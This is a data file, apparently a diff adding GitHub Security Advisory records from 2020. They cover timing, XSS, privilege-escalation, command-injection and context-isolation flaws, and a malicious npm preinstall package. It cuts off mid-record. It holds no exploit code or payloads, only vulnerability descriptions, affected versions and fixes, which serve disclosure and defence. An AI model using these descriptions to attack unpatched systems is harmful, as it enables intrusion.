+1.4.0,GHSA-hggm-jpg3-v476,2022-07-29T18:12:08Z,2020-10-27T20:33:13Z,,['CVE-2020-25659'],RSA decryption vulnerable to Bleichenbacher timing vulnerability,"RSA decryption was vulnerable to Bleichenbacher timing vulnerabilities, which would impact people using RSA decryption in online scenarios. This is fixed in cryptography 3.2. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cryptography'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/security/advisories/GHSA-hggm-jpg3-v476'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25659'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/pull/5507/commits/ce1bef6f1ee06ac497ca0c837fbd1c7ef6c2472b'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/commit/58494b41d6ecb0f56b7c5f05d5f5e3ca0320d494'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyca/cryptography'}, {'type': 'WEB', 'url': 'https://pypi.org/project/cryptography/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-385'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T20:32:44Z', 'nvd_published_at': '2021-01-11T16:15:00Z'}"
+1.4.0,GHSA-mp9m-g7qj-6vqr,2021-10-08T21:26:59Z,2020-10-27T20:30:48Z,,[],Unauthorized privilege escalation in Mod module,"### Impact
+An unauthorized privilege escalation exploit has been discovered in the Mod module: this exploit allows Discord users with a high privilege level within the guild to bypass hierarchy checks when the application is in a specific condition that is beyond that user's control. By abusing this exploit, it's possible to perform destructive actions within the guild the user has high privileges in.
+
+### Patches
+This exploit has been fixed on version & ``3.4.1``.
+
+### Workarounds
+Unloading the Mod module with ``unload mod`` __or__, disabling the ``massban`` command with ``command disable global massban`` can render this exploit not accessible. We still highly recommend updating to ``3.4.1`` to completely patch this issue.
+
+### References
+* https://github.com/Cog-Creators/Red-DiscordBot/commit/726bfd38adfdfaef760412a68e01447b470f438b
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Cog-Creators/Red-DiscordBot](https://github.com/Cog-Creators/Red-DiscordBot)
+* Over on our [Discord server](https://discord.gg/red)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'red-discordbot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/security/advisories/GHSA-mp9m-g7qj-6vqr'}, {'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/commit/726bfd38adfdfaef760412a68e01447b470f438b'}, {'type': 'PACKAGE', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/'}, {'type': 'WEB', 'url': 'https://github.com/Cog-Creators/Red-DiscordBot/releases/tag/3.4.1'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Red-DiscordBot/'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T20:26:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6gw4-x63h-5499,2021-11-19T13:51:50Z,2020-10-19T20:40:59Z,,['CVE-2020-15245'],Ability to switch customer email address on account detail page and stay verified,"### Impact
+The user may register in a shop by email mail@example.com, verify it, change it to the mail another@domain.com and stay verified and enabled. This may lead to having accounts addressed to totally different emails, that were verified. Note, that this way one is not able to take over any existing account (guest or normal one).
+
+### Patches
+Patch has been provided for Sylius 1.6.x and newer - 1.6.9, 1.7.9, 1.8.3. Versions older than 1.6 are not covered by our security support anymore.
+
+### Workarounds
+If for whatever reason you are not able to upgrade your application version, you may resolve this issue on your own by creating a custom event listener, which will listen to the `sylius.customer.pre_update` event. You can determine that email has been changed if customer email and user username are different. They are synchronized later on. Pay attention, to email changing behavior for administrators. You may need to skip this logic for them. In order to achieve this, you should either check master request path info, if it does not contain `/admin` prefix or adjust event triggered during customer update in the shop. You can find more information on how to customize the event here.
+
+### Acknowledgements
+
+This security issue has been reported by Mircea Silviu (@decemvre), thanks a lot!
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Email us at [security@sylius.com](mailto:security@sylius.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.8.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/security/advisories/GHSA-6gw4-x63h-5499'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15245'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/commit/60636d711a4011e8694d10d201b53632c7e8ecaf'}, {'type': 'PACKAGE', 'url': 'https://github.com/Sylius/Sylius'}]","{'cwe_ids': ['CWE-79', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-19T20:40:50Z', 'nvd_published_at': '2020-10-19T21:15:00Z'}"
+1.4.0,GHSA-36j3-xxf7-4pqg,2022-08-03T23:40:07Z,2020-10-02T16:22:41Z,,['CVE-2020-6506'],Android WebView Universal Cross-site Scripting,"A universal cross-site scripting (UXSS) vulnerability, CVE-2020-6506 (https://crbug.com/1083819), has been identified in the Android WebView system component, which allows cross-origin iframes to execute arbitrary JavaScript in the top-level document. This vulnerability affects React Native apps which use a `react-native-webview` that allows navigation to arbitrary URLs, and when that app runs on systems with an Android WebView version prior to 83.0.4103.106.
+
+## Pending mitigation
+
+Ensure users update their Android WebView system component via the Google Play Store to 83.0.4103.106 or higher to avoid this UXSS. 'react-native-webview' is working on a mitigation but it could take some time.
+
+### References
+
+https://alesandroortiz.com/articles/uxss-android-webview-cve-2020-6506/
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-native-webview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.10.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/react-native-community/react-native-webview/security/advisories/GHSA-36j3-xxf7-4pqg'}, {'type': 'WEB', 'url': 'https://github.com/react-native-webview/react-native-webview/security/advisories/GHSA-36j3-xxf7-4pqg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6506'}, {'type': 'WEB', 'url': 'https://github.com/react-native-webview/react-native-webview/pull/1747'}, {'type': 'WEB', 'url': 'https://alesandroortiz.com/articles/uxss-android-webview-cve-2020-6506/'}, {'type': 'WEB', 'url': 'https://chromereleases.googleblog.com/2020/06/stable-channel-update-for-desktop_15.html'}, {'type': 'WEB', 'url': 'https://crbug.com/1083819'}, {'type': 'PACKAGE', 'url': 'https://github.com/react-native-community/react-native-webview'}, {'type': 'WEB', 'url': 'https://github.com/react-native-webview/react-native-webview/releases/tag/v11.0.0'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1ab80f8591d5c2147898076e3945dad1c897513630aabec556883275@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1eadf38b38ee20405811958c8a01f78d6b28e058c84c9fa6c1a8663d@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2769c33da7f7ece7e4e31837c1e1839d6657c7c13bb8d228670b8da0@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra58733fbb88d5c513b3f14a14850083d506b9129103e0ab433c3f680@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc0ebe639927fa09e222aa56bf5ad6e700218f334ecc6ba9da4397728@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc81e12fc9287f8743d59099b1af40f968f1cfec9eac98a63c2c62c69@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf082834ad237f78a63671aec0cef8874f9232b7614529cc3d3e304c5@%3Ccommits.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202007-08'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202101-30'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1560'}]","{'cwe_ids': ['CWE-79', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-02T16:22:01Z', 'nvd_published_at': '2020-07-22T17:15:00Z'}"
+1.4.0,GHSA-56pc-6jqp-xqj8,2021-01-07T22:51:36Z,2020-10-06T17:46:40Z,,['CVE-2020-15215'],Context isolation bypass in Electron,"### Impact
+Apps using both `contextIsolation` and `sandbox: true` are affected.
+Apps using both `contextIsolation` and `nativeWindowOpen: true` are affected.
+
+This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.
+
+### Workarounds
+There are no app-side workarounds, you must update your Electron version to be protected.
+
+### Fixed Versions
+* `11.0.0-beta.6`
+* `10.1.2`
+* `9.3.1`
+* `8.5.2`
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@electronjs.org](mailto:security@electronjs.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0-beta.0'}, {'fixed': '8.5.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-beta.0'}, {'fixed': '9.3.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-beta.0'}, {'fixed': '10.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-beta.0'}, {'fixed': '11.0.0-beta.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.0.0-beta.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-56pc-6jqp-xqj8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15215'}]","{'cwe_ids': ['CWE-668', 'CWE-693'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-06T17:46:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4fc4-chg7-h8gh,2021-11-19T14:40:52Z,2020-10-19T20:02:44Z,,['CVE-2020-15262'],Unprotected dynamically loaded chunks,"### Impact
+
+All dynamically loaded chunks receive an invalid integrity hash that is ignored by the browser, and therefore the browser cannot validate their integrity. This removes the additional level of protection offered by SRI for such chunks. Top-level chunks are unaffected.
+
+### Patches
+
+This issue is patched in version 1.5.1.
+
+### Workarounds
+
+N/A
+
+### References
+
+https://github.com/waysact/webpack-subresource-integrity/issues/131
+
+### For more information
+If you have any questions or comments about this advisory:
+* Comment on [webpack-subresource-integrity issue #131](https://github.com/waysact/webpack-subresource-integrity/issues/131)
+* Or email us at [security@waysact.com](mailto:security@waysact.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'webpack-subresource-integrity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/waysact/webpack-subresource-integrity/security/advisories/GHSA-4fc4-chg7-h8gh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15262'}, {'type': 'WEB', 'url': 'https://github.com/waysact/webpack-subresource-integrity/issues/131'}, {'type': 'WEB', 'url': 'https://github.com/waysact/webpack-subresource-integrity/commit/3d7090c08c333fcfb10ad9e2d6cf72e2acb7d87f'}, {'type': 'PACKAGE', 'url': 'https://github.com/waysact/webpack-subresource-integrity/'}]","{'cwe_ids': ['CWE-345'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-19T20:02:31Z', 'nvd_published_at': '2020-10-19T20:15:00Z'}"
+1.4.0,GHSA-j257-jfvv-h3x5,2021-11-19T14:42:15Z,2020-10-13T17:30:30Z,,['CVE-2020-15251'],Privilege Escalation in Channelmgnt plug-in for Sopel,"### Impact
+Malicious users are able to op/voice and take over a channel
+
+### Patches
+On version 1.0.3
+
+### Workarounds
+Disable channelmgnt
+
+### References
+https://phab.bots.miraheze.wiki/T117
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [staff(at)mirahezebots(dot)org](mailto:staff@mirahezebots.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sopel_plugins.channelmgnt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MirahezeBots/MirahezeBots/security/advisories/GHSA-23pc-4339-95vg'}, {'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/security/advisories/GHSA-j257-jfvv-h3x5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15251'}, {'type': 'WEB', 'url': 'https://github.com/MirahezeBots/sopel-channelmgnt/pull/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/MirahezeBots/MirahezeBots'}, {'type': 'WEB', 'url': 'https://phab.bots.miraheze.wiki/T117'}, {'type': 'WEB', 'url': 'https://phab.bots.miraheze.wiki/phame/live/1/post/1/summary/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/sopel-plugins.channelmgnt/'}]","{'cwe_ids': ['CWE-862', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-13T17:08:31Z', 'nvd_published_at': '2020-10-13T18:15:00Z'}"
+1.4.0,GHSA-38hx-3542-8fh3,2020-10-01T17:09:44Z,2020-10-01T17:09:56Z,,[],Malicious code in `electorn`,"npm packages `loadyaml` and `electorn` were removed from the npm registry for containing malicious code. Upon installation the package runs a preinstall script that writes a public comment on GitHub containing the following information:
+- IP and IP-based geolocation
+- home directory name
+- local username
+
+The malicious packages have been removed from the npm registry and the leaked content removed from GitHub.",[],"[{'package': {'ecosystem': 'npm', 'name': 'electorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '10.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1562'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-10-01T17:09:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fj59-f6c3-3vw4,2021-09-10T14:54:48Z,2020-10-27T20:40:00Z,,['CVE-2020-26300'],Command Injection in systeminformation,"### Impact
+command injection vulnerability
+
+### Patches
+Problem was fixed with a shell string sanitation fix. Please upgrade to version >= 4.26.2
+
+### Workarounds
+If you cannot upgrade, be sure to check or sanitize service parameter strings that are passed to `is.services()`, `is.inetChecksite()`, `si.inetLatency()`, `si.networkStats()`, `is.services()` and `si.processLoad()`
+
+### References
+_Are there any links users can visit to find out more?_
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [systeminformation](https://github.com/sebhildebrandt/systeminformation)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'systeminformation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.26.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-fj59-f6c3-3vw4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26300'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/bad372e654cdd549e7d786acbba0035ded54c607'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-fj59-f6c3-3vw4'}, {'type': 'PACKAGE', 'url': 'https://github.com/sebhildebrandt/systeminformation'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/systeminformation'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T20:39:22Z', 'nvd_published_at': '2021-09-09T01:15:00Z'}"
+1.4.0,GHSA-2xm2-xj2q-qgpj,2021-10-06T22:02:05Z,2020-10-27T19:15:19Z,,['CVE-2020-15270'],receiving subscription objects with deleted session,"Original Message:
+Hi,
+
+I create objects with one client with an ACL of all users with a specific column value. Thats working so far.
+
+Then I deleted the session object from one user to look if he can receive subscription objects and he can receive them.
+The client with the deleted session cant create new objects, which Parse restricts right.
+
+The LiveQueryServer doesnt detect deleted sessions after the websocket connection was established.
+There should be a mechanism that checks in an specific interval if the session exists.
+I dont know if its true with expired sessions.
+
+Any solutions?
+
+Parse version: 4.3.0
+Parse js SDK version: 2.17
+
+Solution:
+Hi guys.
+
+I've found and fixed the problem. It happens because there are two caches in place for the session token:
+
+- at Parse Server level, which, according with the docs, should be changed via cacheTTL option and defaults to 5 seconds;
+- at Parse Live Query level, which, according with the docs, should be changed via liveQueryServerOptions.cacheTimeout and defaults to 30 days.
+
+But there are three problems:
+
+- cacheTTL has currently no effect over Live Query Server;
+- cacheTimeout also has currently no effect over Live Query Server;
+- cacheTimeout actually defaults to 1h.
+
+So, currently, if you wait 1 hour after the session token was invalidated, the clients using the old session token are not able to receive the events.
+
+What I did:
+
+- Added a test case for the problem;
+- Fixed cacheTTL for Live Query Server;
+- Fixed cacheTimeout for Live Query Server;
+- Changed the cacheTimeout to default 5s;
+- Changed the docs to reflect the actual 5s default for cacheTimeout.
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-2xm2-xj2q-qgpj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15270'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/78b59fb26b1c36e3cdbd42ba9fec025003267f58'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}]","{'cwe_ids': ['CWE-672'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-22T21:12:08Z', 'nvd_published_at': '2020-10-22T22:15:00Z'}"
+1.4.0,GHSA-7733-hjv6-4h47,2021-11-19T15:11:11Z,2020-10-08T19:55:53Z,,['CVE-2020-15241'],Cross-Site Scripting in ternary conditional operator,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C`(5.0)
+> * CWE-79
+
+---
+
+:information_source: This vulnerability has been fixed in May 2019 already, CVE and GHSA were assigned later in October 2020
+
+---
+
+### Problem
+It has been discovered that the Fluid Engine (package `typo3fluid/fluid`) is vulnerable to cross-site scripting when making use of the ternary conditional operator in templates like the following.
+
+```
+{showFullName ? fullName : defaultValue}
+```
+
+### Solution
+Update to versions 2.0.5, 2.1.4, 2.2.1, 2.3.5, 2.4.1, 2.5.5 or 2.6.1 of this `typo3fluid/fluid` package that fix the problem described.
+
+Updated versions of this package are bundled in following TYPO3 (`typo3/cms-core`) releases:
+* TYPO3 v8.7.25 (using `typo3fluid/fluid` v2.5.5)
+* TYPO3 v9.5.6 (using `typo3fluid/fluid` v2.6.1)
+
+### Credits
+Thanks to Bill Dagou who reported this issue and to TYPO3 core merger Claus Due who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2019-013](https://typo3.org/security/advisory/typo3-core-sa-2019-013)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/Fluid/security/advisories/GHSA-7733-hjv6-4h47'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15241'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/Fluid/commit/9ef6a8ffff2e812025fc0701b4ce72eea6911a3d'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/Fluid'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2019-013'}]","{'cwe_ids': ['CWE-601', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-08T19:55:04Z', 'nvd_published_at': '2020-10-08T21:15:00Z'}"
+1.4.0,GHSA-5822-pw57-vv37,2021-10-04T21:25:08Z,2020-10-08T20:13:19Z,,[],XSS vulnerability when listing users on add & modify server pages.,"### Impact
+An XSS vulnerability exists in versions of Pterodactyl Panel before 0.7.19. Affected versions do not properly sanitize account names before rendering them to the dropdown selector in the admin area when creating or modifying a server.
+
+### Patches
+This XSS has been addressed in 0.7.19 and will be rolled forwards into the 1.0-rc.7 release.
+
+### Workarounds
+No workaround exists without manual patching. See https://github.com/pterodactyl/panel/pull/2441/files for the files changed.
+
+### For more information
+If you have any questions or comments about this advisory please reach out on Discord, or by emailing `dane` at `pterodactyl` dot `io`.
+
+_Thank you to Sergej for the responsible disclosure of this issue._",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0-rc.0'}, {'fixed': '1.0.0-rc.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-rc.6'}}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/security/advisories/GHSA-5822-pw57-vv37'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/panel'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-08T20:12:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-94xh-2fmc-xf5j,2023-09-06T23:53:46Z,2020-10-27T20:30:20Z,,['CVE-2020-7752'],systeminformation command injection vulnerability,"### Impact
+command injection vulnerability
+
+### Patches
+Problem was fixed with a shell string sanitation fix. Please upgrade to version >= 4.27.11
+
+### Workarounds
+If you cannot upgrade, be sure to check or sanitize service parameter strings that are passed to si.inetChecksite()
+
+### References
+_Are there any links users can visit to find out more?_
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [systeminformation](https://github.com/sebhildebrandt/systeminformation/issues/new?template=bug_report.md)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'systeminformation'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.27.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-94xh-2fmc-xf5j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7752'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/931fecaec2c1a7dcc10457bb8cd552d08089da61'}, {'type': 'PACKAGE', 'url': 'https://github.com/sebhildebrandt/systeminformation'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/blob/master/lib/internet.js'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SYSTEMINFORMATION-1021909'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/systeminformation'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T20:30:03Z', 'nvd_published_at': '2020-10-26T17:15:00Z'}"
+1.4.0,GHSA-r82c-j4mq-5xfw,2020-10-27T19:19:44Z,2020-10-27T19:19:56Z,,[],Update bitlyshortener to >=0.5.0 to prevent generating some invalid short URLs,"### Impact
+Due to a sudden upstream breaking change by Bitly, versions of `bitlyshortener` <0.5.0 can generate an invalid short URL when a vanity domain exists.
+
+### Patches
+Upgrading `bitlyshortener` to 0.5.0 or newer will prevent the generation of any such invalid short URLs.
+
+### References
+* [Release notes](https://github.com/impredicative/bitlyshortener/releases)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'bitlyshortener'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/impredicative/bitlyshortener/security/advisories/GHSA-r82c-j4mq-5xfw'}, {'type': 'WEB', 'url': 'https://github.com/impredicative/bitlyshortener/commit/3d412feb77f3daf6f71536463734c2119a55968d'}, {'type': 'WEB', 'url': 'https://github.com/impredicative/bitlyshortener/releases/tag/0.5.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/bitlyshortener/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-27T19:19:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g5vf-v6wf-7w2r,2021-01-07T22:50:52Z,2020-10-16T00:51:24Z,,['CVE-2020-8929'],Ciphertext Malleability Issue in Tink Java,"### Impact
+Tink's Java version before 1.5 under some circumstances allowed attackers to change the key ID part of the ciphertext, resulting in the attacker creating a second ciphertext that will decrypt to the same plaintext. This can be a problem in particular in the case of encrypting with a deterministic AEAD with a single key, and relying on the fact that there is only a single valid ciphertext per plaintext.
+
+No loss of confidentiality or loss of plaintext integrity occurs due to this problem, only ciphertext integrity is compromised.
+
+### Patches
+The issue was fixed in this [pull request](https://github.com/google/tink/commit/93d839a5865b9d950dffdc9d0bc99b71280a8899).
+
+### Workarounds
+The only workaround is to backport the fixing [pull request](https://github.com/google/tink/commit/93d839a5865b9d950dffdc9d0bc99b71280a8899).
+
+### Details
